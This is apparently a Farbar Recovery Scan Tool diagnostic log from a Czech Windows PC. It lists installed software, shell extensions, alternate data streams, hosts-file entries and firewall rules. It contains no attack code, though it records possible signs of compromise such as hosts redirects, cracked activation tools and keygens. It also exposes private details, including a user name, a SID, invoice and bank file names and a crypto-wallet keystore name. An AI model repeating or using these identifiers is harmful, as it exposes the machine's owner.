Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in
2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
